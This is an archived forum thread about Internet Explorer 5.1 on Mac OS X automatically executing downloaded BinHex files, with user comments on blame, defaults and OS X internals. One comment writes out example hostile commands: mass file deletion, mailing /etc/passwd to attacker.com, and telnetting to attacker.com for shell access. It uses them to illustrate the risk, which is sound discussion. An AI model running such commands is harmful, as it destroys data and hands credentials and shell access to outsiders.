Huge security hole in Internet Explorer for MacOS

Brad Lucier writes "Macintouch is reporting (go down the page a bit) that Internet Explorer 5.1, which comes preinstalled on MacOS X 10.1, has a huge security hole---when it downloads arbitrary programs encoded in the Macintosh's standard BinHex (.hqx) format, it automatically executes them. " Well I guess thats one way to make Unix insecure. Can anyone actually confirm this since it looks kinda sketchy. I wonder what someone's rationale would be for that:"Oh this won't hurt anyone, and saving that extra 'OK' click will be great!".

Re:Intrinsic Security in OS X

While this may be true, it is completely unacceptable that Microsoft made execution of a downloaded encrypted binhex file default. The only possible explanation for this behavior is an attempt by Microsoft to generate negative press for the Mac by allowing this vector of unprotected program execution. Also, it has always been standard to offload the decoding of these files to Stuffit Expander or other such decompression programs. None of these other programs have ever had this so-called execution upon dowload as the default behavior. This is seriously irresponsible and Microsoft deserves a public grilling for it. I am glad there are so many other options on Mac OS X for surfing the web. Users, I think, should use them and avoid this flawed mess.

i didn't even think it was a bug

[SirSlud]

With MS's history, my friend discovered this three days ago and told me. Both of us assumed since it is an MS product that it was the way it was meant to be. Its such an obvious hole that we didn't even think it was a bug, just terrible and user-un-friendly design (as per the usual MS shit.)

Sounds like the recent slrn bug

[coyote-san]

This sounds a lot like the recently discovered slrn bug (see Bugtraq, LWN, Debian) that automatically executed all scripts encountered, apparently assuming they were self-extracting archive files.

However, I'm not sure Microsoft should be let off the hook for the equivalent behavior on the Mac. The Unix code was there for a very, very long time... when it was added it was a reasonable assumption that people would not send nasties because it was too easy to complain to their employer or grad department (the only way to get online) and cause the sender significant personal pain. (This is also a painful reminder that just because code is available doesn't mean that the right people are reviewing it.) In contrast, by the time somebody added that code to the Mac version of MSIE, the possibility of untraceable, hostile scripts should have been obvious.

Re:Not M$

[kilgore_47]

Not true.

Microsoft has a large mac software division that makes IE as well as Office for Mac and some other software.

In fact, microsoft's mac division has more mac programmers than anywhere else but Apple (or so I read in a macworld article a few months back).

Re: Well, yeah...

[gwyrdd+benyw]

It is dumb, but you can turn it off in the preferences panel.

This is no excuse - all default options should be sensible options. Lots of people don't change their prefs from the defaults until something in the standard behaviour annoys them - which may take a long time, or forever.

It's still dangerous, even if it can be disabled. It shouldn't even be an option. If you want to run the thing so badly, then go run it manually.

(subject changed to avoid the "postersubj compression" error, whatever that is...)

Re:Intrinsic Security in OS X

[TrumpetPower!]

rm -rf /home/urchlay

If mass destruction is your aim, then the following will do the job nicely:

find / -user $USER -exec rm -f {} \;

Or, you could:

mail badguy@attacker.com < /etc/passwd

Maybe it'd be a program to brute-force su, something often possible (brute-forcing ssh or telnet usually isn't.

With a bit more work, you could:

telnet attacker.com 666

And run something on port 666 on attacker.com that gives attacker.com shell access.

All this assumes the rest of the operating system's security is iron-clad. Local exploits are, in general, much easier to pull off than remote ones. Account compromise is not a nice thing, at all.

b&

Wow are you way off...

[MO!]

Fact #1: MacOS X is based on FreeBSD 3.2 wrapped around a Mach microkernel.

Fact #2: FreeBSD does not use a Mach kernel.

Fact #3: The /etc/master.passwd file on a MacOS X system has nothing of value. It's there for legacy needs and has just the normal "shell=/bin/noshell" accounts as well as the disabled root account in it. To get useful information, you have to do a NetInfo dump of whatever class your looking for, in this case the encrypted passwd info.

Fact #4: The unix-like, BSD family, portion that makes up the base of MacOS X is not proprietary - it's called Darwin and is open and downloadable in source form (even ported to Intel). Only the upper level graphics system is closed. It's kinda like running a proprietary X Windows system on top of Linux.

Finally, Fact #5: Although there are some proprietary BSD-based OS's, the majority of the proprietary Unix OS's are based on AT&T->Novell->SCO->The OpenGroup code - not on BSD.

Please investigate your claims before boasting such innaccuracies.

Why only IE?

[ZigMonty]

What I want to know is why is Apple only bundling IE with MacOSX? There are plenty of good browsers for MacOSX. Hell, they're all better than IE. I've got Opera, Netscape 6.1, Mozilla, and my personal favorite OmniWeb (Must try iCab). Apple used to bundle both Netscape and IE, why the change? OK, I'm not suggesting they bundle Netscape, it *really* sucks for MacOSX. But how about OmniWeb or Opera? Some choice would be good. Yes, I know that the user could download another browser, but how many novices would? They've got plenty more room on the CD. It seems like Apple signed a black deal with microsoft.